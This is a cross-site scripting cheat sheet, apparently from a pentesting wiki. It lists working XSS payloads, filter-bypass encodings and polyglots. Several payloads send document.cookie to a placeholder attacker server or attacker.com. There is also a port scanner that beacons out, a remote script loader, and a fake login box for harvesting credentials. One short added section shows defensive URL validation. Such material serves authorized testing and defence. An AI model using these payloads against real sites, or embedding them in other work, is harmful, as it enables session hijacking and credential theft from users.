XSS (Cross Site Scripting)

Methodology

1- Check if the server response includes content sent by you.
2- Find where the input you control is located (inside a tag, outside a tag, inside the URL --Form with PHP_SELF--, inside JavaScript code?).
3- Check how you can add JavaScript code:
3.1- On an event inside a tag (onerror, onfocus, href...)
3.2- Closing a tag and opening a new one ("><img …")
3.3- Opening a new tag ("<script>...")
3.4- Altering the JavaScript code execution
4- Check which characters are allowed (can you close and/or open a tag? can you create a new event handler? can you inject JavaScript code?).
5- Create a PoC.

If you cannot exploit an injection vulnerability as an XSS, check Dangling Markup - HTML scriptless injection.

Tags

<img src=x onerror=alert(document.cookie);>
<body onload=alert('test1')>
<button onfocus=alert(1) autofocus>
<iframe src="javascript:alert(0)" height="0" width="0">
<iframe src="data:text/html;base64,PHNjcmlwdD5wYXJlbnQuYWxlcnQoZG9jdW1lbnQuZG9tYWluKTs8L3NjcmlwdD4=">
<svg onload=alert('XSS')>
<svg onload=alert(1)>
<Video><source onerror="alert('XSS')">
<audio><source onerror="alert('XSS')">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="></object>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<body ontouchstart=alert(1)> // Triggers when a finger touches the screen
<body ontouchend=alert(1)> // Triggers when a finger is removed from the touch screen
<body ontouchmove=alert(1)> // Triggers when a finger is dragged across the screen

More

XSS uploading files (svg)

Upload as an image a file like the following one (from http://ghostlulz.com/xss-svg/):

Content-Type: multipart/form-data; boundary=---------------------------232181429808
Content-Length: 574

-----------------------------232181429808
Content-Disposition: form-data; name="img"; filename="img.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("Ghostlulz XSS");
   </script>
</svg>
-----------------------------232181429808--

Clickjacking needed

<b onmouseover=alert('Wufff!')>click me!</b>
<isindex x="javascript:" onmouseover="alert(XSS)">click me!
<input type="text" value="" Onblur=alert(666) size="30">
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
<img ismap= itemtype='yyy style=width:100%;height:100%;position:fixed;left:\ 0px;top:0px; onmouseover=alert(/XSS/)//'>
<img ismap=itemtype=yyy style=width:100%;height:100%;position:fixed;left:0px;top\ :0px; onmouseover=alert(/XSS/)//>
<a href="#" onclick="alert(1)"> //If the user clicks in the next <a> the alert will be executed

XSS on UTH path

https://github.com/RealLinkers/cookieless

Exfiltrate code

<img src='http://attacker.com/log.php?HTML= //Get all code until next '
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text= //Get all code until next '
<textarea autofocus onfocus=alert(1) //Get all code

Special combinations

<iframe/src="data:text/html,<svg onload=alert(1)>">
<input type=image src onerror="prompt(1)">
<svg onload=alert(1)//
<img src="/" =_=" title="onerror='prompt(1)'">
<img src='1' onerror='alert(0)' <
<script x> alert(1) </script 1=2
<script x>alert('XSS')<script y>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<svg><x><script>alert('1'&#41</x>
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);"

You can also send all possible tags and all possible events and use https://gitlab.com/jlajara/xss-tag_event-analyzer to find whether any combination of tag and event is suitable to exploit the XSS. More info: https://jlajara.gitlab.io/posts/2020/01/25/XSS_tag_event_analyzer.html

Basic Bypass

script --> ScrIpT
<ScrIpT>alert(1)</ScrIpT>
space == / == /*%00/ == /%00*/
Strings --> "XSS" == /XSS/.source
<input/autofocus/*%00//%00*/onfocus=alert(1)>
Do not close the tag; end with " <" or " //": <iframe SRC="javascript:alert('XSS');" <
Extra open: <<script>alert("XSS");//<</script>
Substitute parentheses with backticks in alert and setTimeout: <details open ontoggle=alert`1`> setTimeout`alert\u0028document.domain\u0029`;
Add unnecessary fields
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
Input as image: <input type=image src onerror="prompt(1)">

PHP FILTER_VALIDATE_EMAIL flag Bypass

"><svg/onload=confirm(1)>"@x.y

Ruby-On-Rails bypass

Due to RoR mass assignment, quotes are inserted in the HTML, so the quote restriction is bypassed and additional fields (onfocus) can be added inside the tag. For example (from this report), if you send the payload:

contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa

The pair "Key","Value" will be echoed back like this:

{" onfocus=javascript:alert(&#39;xss&#39;) autofocus a"=>"a"}

Then, the onfocus attribute will be inserted:

And an XSS occurs.

From here: You can execute an XSS payload inside a hidden attribute, provided you can persuade the victim into pressing the key combination. On Firefox Windows/Linux the key combination is ALT+SHIFT+X and on OS X it is CTRL+ALT+X. You can specify a different key combination using a different key in the access key attribute. Here is the vector:

<input type="hidden" accesskey="X" onclick="alert(1)">

The XSS payload will be something like this: " accesskey="x" onclick="alert(1)" x='

You might have a link element with a rel attribute set to canonical; if you inject the accesskey attribute with an onclick event, then you have XSS:

<link rel="canonical" accesskey="X" onclick="alert(1)" />

XSS in 20 length

Taken from the blog of Jorge Lajara.

<svg/onload=alert``>
<script src=//aa.es>
<script src=//℡㏛.pw>

The last one uses 2 Unicode characters which expand to 5: telsr

More of these characters can be found here. To check which characters they decompose into, check here.

Space,onXXX=,javascript: Bypass

Substitute the space for: %0A (\n) %09 (\t) %0D (\r)

<iframe src="javascri%0Apt:alert(0)">
<iframe src="javascri%09pt:alert(0)">
<iframe src="javascri%0Dpt:alert(0)">
<iframe src="javascript://%0Aalert(1)">
<iframe src="javascript://anything%0D%0A%0D%0Awindow.alert(1)">
<img src onerror%0A=alert(1) />
<img src onerror%09=alert(1) />
<img src onerror%0D=alert(1) />
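
Why the `javascri%0Apt:` variants above matter for validation code: the URL parser drops tab, LF and CR before it reads the scheme, so a check that pattern-matches the raw string lets them through. The following is an added example, not from the original page (`naiveIsSafeUrl`, `isSafeUrl`, `audit` and the `https://app.example/` base are assumptions); it compares such a check with one that parses first and then allowlists the scheme, using the decoded form of the values listed above.

```javascript
// Added example: not part of the original page. All names are illustrative.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);
const BASE = "https://app.example/"; // hypothetical origin for resolving relative links

// Weak check: matches the raw string, so it misses anything the browser's
// URL parser strips or normalises before reading the scheme.
function naiveIsSafeUrl(value) {
  return !/^\s*javascript:/i.test(value);
}

// Stronger check: parse with the WHATWG URL parser (the same algorithm browsers
// use, which drops tab/LF/CR), then allow only known-good schemes.
function isSafeUrl(value) {
  let parsed;
  try {
    parsed = new URL(value, BASE);
  } catch (err) {
    return false; // unparsable input is rejected rather than passed through
  }
  return ALLOWED_SCHEMES.has(parsed.protocol);
}

// Constructed samples: decoded forms of values from this page, plus benign links.
const SAMPLES = [
  "javascri\npt:alert(0)",
  "javascri\tpt:alert(0)",
  "javascri\rpt:alert(0)",
  "javascript://\nalert(1)",
  "data:text/html,<svg onload=alert(1)>",
  "/account/settings",
  "https://example.com/docs",
  "mailto:security@example.com",
];

// Run both checks over every sample so the disagreement is visible per row.
function audit(samples) {
  return samples.map((value) => ({
    value: JSON.stringify(value),
    naive: naiveIsSafeUrl(value),
    strict: isSafeUrl(value),
  }));
}

console.table(audit(SAMPLES));
```

The scheme allowlist only decides where a link may point; the value still has to be HTML-attribute-encoded when it is written into the page.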

Javascript encodings

Unicode

https://github.com/dreadlocked/ctf-writeups/blob/master/nn8ed/README.md

Valid as a string inside a script, or as the name of a function inside an HTML tag (not for parameters or parentheses).

\u0061 --> "a"
\u{61} --> "a"

alert(1)
<script>\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029</script> NOT WORK
<script>eval('\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029')</script> WORK
<img src onerror=\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029 /> NOT WORK
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) /> WORK
<svg onload="javascript:\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029" // NOT WORK
<svg onload=\u0061\u006C\u0065\u0072\u0074(1) // WORK
<iframe src="javascript:\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029"></iframe> NOT WORK
<iframe src="javascript:\u0061\u006C\u0065\u0072\u0074(1)"></iframe> WORK

You can do the same using this syntax: \u{61}

Surrogate Pairs

https://github.com/dreadlocked/ctf-writeups/blob/master/nn8ed/README.md
https://mathiasbynens.be/notes/javascript-unicode
https://mathiasbynens.be/notes/javascript-encoding

Find Unicode surrogate pairs of 2 chars (the last 2 hex digits of H == 1st char and the last 2 hex digits of L == 2nd char):

def unicode(findHex):
    # Surrogate pairs only exist for code points U+10000..U+10FFFF
    for i in range(0x10000, 0x110000):
        # High surrogate and the character encoded by its last two hex digits
        H = hex(((i - 0x10000) // 0x400) + 0xD800)
        h = chr(int(H[-2:], 16))
        # Low surrogate and the character encoded by its last two hex digits
        L = hex(((i - 0x10000) % 0x400) + 0xDC00)
        l = chr(int(L[-2:], 16))
        if h == findHex[0] and l == findHex[1]:
            print(H.replace("0x", "\\u") + L.replace("0x", "\\u"))

URLencode

%61 --> "a"

alert(1)
<script>%61%6c%65%72%74%28%31%29</script> NOT WORKS
<script>eval("%61%6c%65%72%74%28%31%29")</script> NOT WORKS
<img src onerror="javascript:%61%6c%65%72%74%28%31%29" /> NOT WORKS
<svg onload="javascript:%61%6c%65%72%74%28%31%29" // NOT WORKS
<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe> WORKS

HTML entities

Valid inside HTML tags (not inside <script>)

&#x Hexadecimal with or without zeros

&#x61 --> "a" &#x00061 --> "a"

alert(1)
<script>&#x61&#x6c&#x65&#x72&#x74&#x28&#x31&#x29</script> NOT WORKS
<script>eval("&#x61&#x6c&#x65&#x72&#x74&#x28&#x31&#x29")</script> NOT WORKS
<img src onerror=&#x61&#x6c&#x65&#x72&#x74&#x28&#x31&#x29 /> WORKS
<img src onerror="&#x00061&#x0006c&#x00065&#x00072&#x00074&#x00028&#x00031&#x00029" /> WORKS
<svg onload=&#x61&#x6c&#x65&#x72&#x74&#x28&#x31&#x29 // WORKS
<iframe src="javascript:&#x61&#x6c&#x65&#x72&#x74&#x28&#x31&#x29"></iframe> WORKS( javascript:alert(1) )

&# Decimal with or without zeros

&#97 --> "a" &#00097 --> "a"

alert(1)
<script>&#97&#108&#101&#114&#116&#40&#49&#41</script> NOT WORKS
<script>eval('&#97&#108&#101&#114&#116&#40&#49&#41')</script> NOT WORKS
<img src onerror=&#97&#108&#101&#114&#116&#40&#49&#41 /> WORKS
<img src onerror=&#00097&#000108&#000101&#000114&#000116&#00040&#00049&#00041 /> WORKS
<svg onload=&#97&#108&#101&#114&#116&#40&#49&#41 // WORKS
<iframe src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41"></iframe> WORKS( javascript:alert(1) )

Entities

( --> &#40;
document.cookie
<script>alert(document.cookie)</script> NOT WORKS
<script>eval(alert(document.cookie))</script> NOT WORKS
<img src onerror=alert(document.cookie) /> WORKS
<svg onload=javascript:alert(document.cookie) // WORKS
<iframe src=javascript:alert(document.cookie)> WORKS

Hexadecimal

Valid as String inside a script \x61--> "a"

alert(1)
<script>\x61\x6c\x65\x72\x74\x28\x31\x29</script> NOT WORKS
<script>eval("\x61\x6c\x65\x72\x74\x28\x31\x29")</script> WORKS
<img src onerror=\x61\x6c\x65\x72\x74\x28\x31\x29 /> NOT WORKS
<svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' // NOT WORKS
<iframe src=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' /> WORKS //<svg onload=alert(1)>

Octal

Valid as String inside a script \141 --> "a"

alert(1)
<script>\141\154\145\162\164\50\61\51</script> NOT WORKS
<script>eval("\141\154\145\162\164\50\61\51")</script> WORKS
<img src onerror=\141\154\145\162\164\50\61\51 /> NOT WORKS
<svg onload=javascript:'\141\154\145\162\164\50\61\51' // NOT WORKS
<iframe src=javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' /> WORKS //<svg onload=alert(1)>

Data encodings

<object data="data:text/html,<script>alert(1)</script>"></object>
<object data="data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e"></object>
<object data="data:text/html;charset=UTF-8,<script>alert(1)</script>"></object>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="></object>
<object data="data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg"></object>

Retrieve Cookies

<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>
<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['href']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>
<script>var i=new Image();i.src="http://<YOUR_SERVER_IP>/?c="+document.cookie</script>
<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>
<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>

Other Payloads

Port Scanner

const checkPort = (port) => {
    fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
        let img = document.createElement("img");
        img.src = `http://attacker.com/ping?port=${port}`;
    });
}

for(let i=0; i<1000; i++) {
    checkPort(i);
}

Box to ask for credentials

<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>

Javascript Tricks

alert(String.fromCharCode(88,83,83))
alert`document.cookie`
alert(document['cookie'])
with(document)alert(cookie)
eval('ale'+'rt(1)')
(alert)(1)
(alert(1))in"."
a=alert,a(1)
[1].find(alert)
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
this['alert'](4)
frames['alert'](5)
content['alert'](6)
[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
top[/al/.source+/ert/.source](1)
top[8680439..toString(30)](1)
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)

XSS in dynamic created PDF

If a web page is creating a PDF using user controlled input, you can try to trick the bot that is creating the PDF into executing arbitrary JS code. So, if the PDF creator bot finds some kind of HTML tags, it is going to interpret them, and you can abuse this behaviour to cause a Server XSS. Find more information here.

XSS resources

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection
http://www.xss-payloads.com
https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt
https://github.com/materaj/xss-list
https://github.com/ismailtasdelen/xss-payload-list
https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec

Polyglots

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`

An HTML comment can be closed using --> or --!>

Obfuscation & Advanced Bypass

https://github.com/aemkei/katakana.js
https://ooze.ninja/javascript/poisonjs
https://javascriptobfuscator.herokuapp.com/
https://skalman.github.io/UglifyJS-online/
http://www.jsfuck.com/
More sophisticated JSFuck: https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce
